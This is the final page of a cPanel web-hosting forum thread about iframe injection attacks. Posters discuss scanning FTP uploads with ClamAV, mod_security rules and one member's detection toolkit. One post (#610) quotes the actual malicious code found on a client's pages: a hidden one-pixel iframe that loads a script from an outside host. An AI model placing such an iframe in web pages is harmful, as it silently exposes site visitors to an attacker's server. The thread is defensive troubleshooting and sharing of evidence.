Community Forums
Connect with us on LinkedIn
+ Reply to Thread
Page 41 of 41 FirstFirst ... 31 39 40 41
Results 601 to 613 of 613
  1. #601
    Registered User
    Join Date
    Jul 2009
    Posts
    2

    Default

    Quote Originally Posted by Silver_2000 View Post
    pardon my ignorance but is clamav even capable of scanning uploaded files ?

    I know it scans emails - but does it even have the ability to scan every ftp or ssh uploaded file ?
    It can't. But pure-ftpd can run custom script after every upload, and you can call clamav in that script.

  2. #602
    Member Host1Plus's Avatar
    Join Date
    Jun 2009
    Location
    UK
    Posts
    9

    Default

    Thanks for spiral's post, now I'm working on it.
    Host1Plus.com - Professional Multi-Location Web Hosting Service.

  3. #603
    Member This forum account has been confirmed by cPanel staff to represent a vendor.
    Join Date
    Apr 2008
    Posts
    80

    Default

    proftpd includes external clamav support for uploads.
    Michael Shinn
    Prometheus Global - home of gotroot.com and Atomicorp and
    Secure Your Server Now with Atomic Secured Linux!

  4. #604
    Member
    Join Date
    Mar 2002
    Posts
    297

    Default

    seems that pureftp can also scan

    but Im unable to get the config here to work

    Integrate pure-ftpd with clamav - CPanelDirect

    would be a great addition

    everything looks right - ive triple checked the steps BUT the sample file is NOT removed

  5. #605
    Member sehh's Avatar
    Join Date
    Feb 2006
    Location
    Europe
    Posts
    461

    Default

    clamav is capable of scanning files, period. That means everything that is a file. Actually it can scan more than just files, it can scan streams of data for virus identities.

    So can you make it scan files uploaded by XYZ method, sure you can.

    I do know that pure-ftpd allows you to set an antivirus to scan uploaded files.

    cPanel allows users to scan their entire home directory with clamav!!!

    If you want, you can probably make ssh do the same with some coding changes.

  6. #606
    Member
    Join Date
    Oct 2003
    Posts
    44

    Default modsec rule

    Hello everyone,

    Is there a modsec rule that should help prevent this iframe hack? Ihave some sites being infected with this iframe hack and although my servers have mod security installed in them, I am wondering if there are some modsec rules that can filter this out.

  7. #607
    Member
    Join Date
    Sep 2002
    Location
    Europe
    Posts
    270

    Default

    I didn't try this clamAV combination with FTP to scan uploaded files but I was told that this might cause problems for the users. I was told that there might be delay in uploading files, so upload can take some tim based on how heavy is file.
    Can someone, who is using this combination, confirm this and what can we expect ?

  8. #608
    Member
    Join Date
    Apr 2005
    Location
    Istanbul / Turkey
    Posts
    57

  9. #609
    Member nettigritty's Avatar
    Join Date
    Jan 2004
    Location
    Bangalore, India
    Posts
    196

    Default

    would be nice to have something like this come from cpanel integrated in WHM (considering this thread is now 2 years old and 600+ posts long)

  10. #610
    Member
    Join Date
    Sep 2002
    Location
    Europe
    Posts
    270

    Default

    One of my clients today attacked with iframe:

    <iframe src="http://murianin.com/in.php" width="1" height="1" style="visibility:hidden;position:absolute"></iframe>

    Code was at the bottom of almost every .htm file in his account. Not just index named files but all others too.

  11. #611
    Member amal's Avatar
    Join Date
    Nov 2003
    Location
    India
    Posts
    153

    Smile

    Quote Originally Posted by nettigritty View Post
    would be nice to have something like this come from cpanel integrated in WHM (considering this thread is now 2 years old and 600+ posts long)
    yeah, that would be a nice gesture from the part of cpanel. Cpanel provides us with almost all features. This one is something which would benefit the entire cpanel user community.

  12. #612
    BANNED
    Join Date
    Jun 2005
    Location
    Wild Wild West
    Posts
    2,025

    Lightbulb

    I actually wrote a process that scans the entire server for I-Frame attacks both old and the newer more sophisticated encrypted rewrite hacks, notifies the administrators by email, suspends and locks accounts that have been compromised, deep scans all files on detected compromised accounts, integrates with CSF and blocks the original attacker and notifies the account owner they need to scan their home computers ASAP for the trojan that stole their password in the first place.
    It also monitors FTP activity checking uploaded files and looking for suspicious patterns such as mass uploads of "index.*" files at once, changes in typical IP netblocks -- especially those from China, etc.

    About 100 or so of my web hosting / data center clients have been upgraded with these new scanner processes with good results and a lot more hacks have been detected and blocked than would have been otherwise.

    The main scanner is now part of my Security Toolkit; However, I've also developed a lighter standalone version for those who think they may be having I-Frame attack issues or need better tracking of that.

    --Spiral

    PS: I'm currently working on WHM integration for the above
    Last edited by Spiral; 11-19-2009 at 09:45 PM.

  13. #613
    Member
    Join Date
    Mar 2003
    Posts
    604

    Default

    Quote Originally Posted by Spiral View Post
    I actually wrote a process that scans the entire server for I-Frame attacks both old and the newer more sophisticated encrypted rewrite hacks, notifies the administrators by email, suspends and locks accounts that have been compromised, deep scans all files on detected compromised accounts, integrates with CSF and blocks the original attacker and notifies the account owner they need to scan their home computers ASAP for the trojan that stole their password in the first place.
    It also monitors FTP activity checking uploaded files and looking for suspicious patterns such as mass uploads of "index.*" files at once, changes in typical IP netblocks -- especially those from China, etc.

    About 100 or so of my web hosting / data center clients have been upgraded with these new scanner processes with good results and a lot more hacks have been detected and blocked than would have been otherwise.

    The main scanner is now part of my Security Toolkit; However, I've also developed a lighter standalone version for those who think they may be having I-Frame attack issues or need better tracking of that.

    --Spiral

    PS: I'm currently working on WHM integration for the above

    Wow, this sounds great. How do we get ahold of that? I didn't see it on your site....

Similar Threads & Tags
Similar threads

  1. Replies: 123
    Last Post: 06-17-2010, 09:07 PM
  2. SOLUTION for Gumblar/IFRAME/JS hacks with stolen FTP Passwords...
    By hidonet in forum cPanel and WHM Discussions
    Replies: 98
    Last Post: 12-22-2009, 10:44 PM
  3. iframe / javascript hacks?
    By jack01 in forum cPanel and WHM Discussions
    Replies: 612
    Last Post: 11-20-2009, 09:14 PM
  4. IP addresses from IFrame Hacks
    By noimad1 in forum cPanel and WHM Discussions
    Replies: 22
    Last Post: 01-29-2008, 04:41 AM
  5. JavaScript & IFRAME Insert Hacks Through xfercpanel
    By dynaweb in forum cPanel and WHM Discussions
    Replies: 3
    Last Post: 09-15-2007, 01:46 PM
Linkedin       Facebook       Twitter       RSS       Flickr       YouTube